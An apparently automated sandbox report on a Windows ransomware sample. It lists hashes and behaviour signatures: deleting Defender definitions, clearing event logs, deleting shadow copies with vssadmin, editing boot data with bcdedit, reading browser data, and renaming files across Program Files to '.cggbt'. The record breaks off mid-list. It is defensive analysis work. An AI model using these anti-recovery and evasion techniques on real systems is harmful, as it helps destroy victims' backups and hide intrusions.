Analysis
-
max time kernel
47s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
22-11-2021 11:29
Static task
static1
Behavioral task
behavioral1
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win10-en-20211104
General
-
Target
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
-
Size
3.5MB
-
MD5
d63d3afed4c1975a7e31906e0e163305
-
SHA1
b3f4e45ef92c5ec76bfdaeb3a19071db65ddd7c0
-
SHA256
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747
-
SHA512
3c92f0cb5e63620919d7ab412741396fb0f65558a621c4328a69a33ada732f80d03548d3cd88734cd4bc038a7b7c240ecfe61a1f56ead387f04c700fe7d6c1be
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4040 MpCmdRun.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 836 bcdedit.exe 960 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Kok7cyRH9GI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_cD8T1Ta62_w0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_KT5X_5a-7ng0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ntooEAG4iZw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_4jUnHW99lhU0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\hive.xsl.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_j-cpD3pkizM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_npbZbbC2RkQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_De-XDsvHc1I0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_QUkGLHmyjpg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_d8Cy0Om_DC00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_GDrrLnl9Qm80.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_wCvXV_5SRPY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RzqTxXV8Kh00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_uzyBLha6YqQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_kOnEkEP7zlc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Ft1jep0weOc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_6UJFVa8n4dQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_L1T_0PpmhVM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aCT1E--oNV40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_e0Tnv6nKEIs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_rKVjXBzkZ8k0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_CQzeRR2fwuc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_mWUWhy92l7M0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_xeZSbC3iybQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\Office16\SLERROR.XML.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ZU9T9t9bg6w0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_44KiIgGyeQ00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_yqlu-bFum4E0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Notcfg4qpYI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_FJifcPY7R4g0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_dkQg7KluZ7Q0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_MV08c-xl9Hw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_jQVu31dwSks0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ZKbhH-LHKsg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_TT-plhxUakI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aXouNT_C5lM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_wHJ-I32sPWU0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\msipc.dll.mui.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_v38_5O1F3nw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\ffjcext.zip.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_gytsf4yPnRs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_or80xOB3Mhs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_8IzliHU8rzo0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_twxsgTk7dgE0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_68mHLYPLW5o0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RmR5Q16n4As0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProDemoR_BypassTrial180-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_UWGXPRHMXOg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense2019_eula.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aL5WYqhk_mg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j__k3kKwu3MQQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\logging.properties.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_vt7KtdL0pGI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ebbVWqMyOms0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_xO0owbzLK-M0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_HGC-zZvWTJY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_HqPgqWRhKL80.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_2FZLzCayFfg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Internet Explorer\fr-FR\ieinstal.exe.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_SqhIAZhMlLc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_XROsxkszWI00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_iSxK_PUAqD80.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_85Ysf6D7XCU0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.PowerPivot.ExcelAddIn.tlb.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_A9dCVY_pS_o0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ic7Tf1zmC400.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RK4AzX452iI0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_axQpdrm92c40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.XLA.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_1IA_NJHZS7I0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\cacerts.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_r0Y8Ro3reHo0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_bT1e6oe7tn00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1324 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3688 wevtutil.exe Token: SeBackupPrivilege 3688 wevtutil.exe Token: SeSecurityPrivilege 820 wevtutil.exe Token: SeBackupPrivilege 820 wevtutil.exe Token: SeSecurityPrivilege 1288 wevtutil.exe Token: SeBackupPrivilege 1288 wevtutil.exe Token: SeIncreaseQuotaPrivilege 916 wmic.exe Token: SeSecurityPrivilege 916 wmic.exe Token: SeTakeOwnershipPrivilege 916 wmic.exe Token: SeLoadDriverPrivilege 916 wmic.exe Token: SeSystemProfilePrivilege 916 wmic.exe Token: SeSystemtimePrivilege 916 wmic.exe Token: SeProfSingleProcessPrivilege 916 wmic.exe Token: SeIncBasePriorityPrivilege 916 wmic.exe Token: SeCreatePagefilePrivilege 916 wmic.exe Token: SeBackupPrivilege 916 wmic.exe Token: SeRestorePrivilege 916 wmic.exe Token: SeShutdownPrivilege 916 wmic.exe Token: SeDebugPrivilege 916 wmic.exe Token: SeSystemEnvironmentPrivilege 916 wmic.exe Token: SeRemoteShutdownPrivilege 916 wmic.exe Token: SeUndockPrivilege 916 wmic.exe Token: SeManageVolumePrivilege 916 wmic.exe Token: 33 916 wmic.exe Token: 34 916 wmic.exe Token: 35 916 wmic.exe Token: 36 916 wmic.exe Token: SeIncreaseQuotaPrivilege 660 wmic.exe Token: SeSecurityPrivilege 660 wmic.exe Token: SeTakeOwnershipPrivilege 660 wmic.exe Token: SeLoadDriverPrivilege 660 wmic.exe Token: SeSystemProfilePrivilege 660 wmic.exe Token: SeSystemtimePrivilege 660 wmic.exe Token: SeProfSingleProcessPrivilege 660 wmic.exe Token: SeIncBasePriorityPrivilege 660 wmic.exe Token: SeCreatePagefilePrivilege 660 wmic.exe Token: SeBackupPrivilege 660 wmic.exe Token: SeRestorePrivilege 660 wmic.exe Token: SeShutdownPrivilege 660 wmic.exe Token: SeDebugPrivilege 660 wmic.exe Token: SeSystemEnvironmentPrivilege 660 wmic.exe Token: SeRemoteShutdownPrivilege 660 wmic.exe Token: SeUndockPrivilege 660 wmic.exe Token: SeManageVolumePrivilege 660 wmic.exe Token: 33 660 wmic.exe Token: 34 660 wmic.exe Token: 35 660 wmic.exe Token: 36 660 wmic.exe Token: SeIncreaseQuotaPrivilege 660 wmic.exe Token: SeSecurityPrivilege 660 wmic.exe Token: SeTakeOwnershipPrivilege 660 wmic.exe Token: SeLoadDriverPrivilege 660 wmic.exe Token: SeSystemProfilePrivilege 660 wmic.exe Token: SeSystemtimePrivilege 660 wmic.exe Token: SeProfSingleProcessPrivilege 660 wmic.exe Token: SeIncBasePriorityPrivilege 660 wmic.exe Token: SeCreatePagefilePrivilege 660 wmic.exe Token: SeBackupPrivilege 660 wmic.exe Token: SeRestorePrivilege 660 wmic.exe Token: SeShutdownPrivilege 660 wmic.exe Token: SeDebugPrivilege 660 wmic.exe Token: SeSystemEnvironmentPrivilege 660 wmic.exe Token: SeRemoteShutdownPrivilege 660 wmic.exe Token: SeUndockPrivilege 660 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2876 wrote to memory of 3592 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 70 PID 2876 wrote to memory of 3592 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 70 PID 3592 wrote to memory of 3824 3592 net.exe 72 PID 3592 wrote to memory of 3824 3592 net.exe 72 PID 2876 wrote to memory of 3524 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 73 PID 2876 wrote to memory of 3524 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 73 PID 3524 wrote to memory of 3588 3524 net.exe 75 PID 3524 wrote to memory of 3588 3524 net.exe 75 PID 2876 wrote to memory of 520 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 76 PID 2876 wrote to memory of 520 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 76 PID 520 wrote to memory of 1152 520 net.exe 78 PID 520 wrote to memory of 1152 520 net.exe 78 PID 2876 wrote to memory of 852 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 79 PID 2876 wrote to memory of 852 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 79 PID 852 wrote to memory of 2452 852 net.exe 81 PID 852 wrote to memory of 2452 852 net.exe 81 PID 2876 wrote to memory of 680 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 82 PID 2876 wrote to memory of 680 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 82 PID 680 wrote to memory of 3680 680 net.exe 84 PID 680 wrote to memory of 3680 680 net.exe 84 PID 2876 wrote to memory of 1252 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 85 PID 2876 wrote to memory of 1252 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 85 PID 1252 wrote to memory of 2772 1252 net.exe 87 PID 1252 wrote to memory of 2772 1252 net.exe 87 PID 2876 wrote to memory of 3384 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 88 PID 2876 wrote to memory of 3384 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 88 PID 3384 wrote to memory of 1492 3384 net.exe 90 PID 3384 wrote to memory of 1492 3384 net.exe 90 PID 2876 wrote to memory of 608 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 91 PID 2876 wrote to memory of 608 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 91 PID 608 wrote to memory of 716 608 net.exe 93 PID 608 wrote to memory of 716 608 net.exe 93 PID 2876 wrote to memory of 976 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 94 PID 2876 wrote to memory of 976 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 94 PID 976 wrote to memory of 788 976 net.exe 96 PID 976 wrote to memory of 788 976 net.exe 96 PID 2876 wrote to memory of 3236 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 97 PID 2876 wrote to memory of 3236 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 97 PID 2876 wrote to memory of 948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 99 PID 2876 wrote to memory of 948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 99 PID 2876 wrote to memory of 1192 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 101 PID 2876 wrote to memory of 1192 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 101 PID 2876 wrote to memory of 1388 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 103 PID 2876 wrote to memory of 1388 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 103 PID 2876 wrote to memory of 1428 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 105 PID 2876 wrote to memory of 1428 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 105 PID 2876 wrote to memory of 1836 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe 107 PID 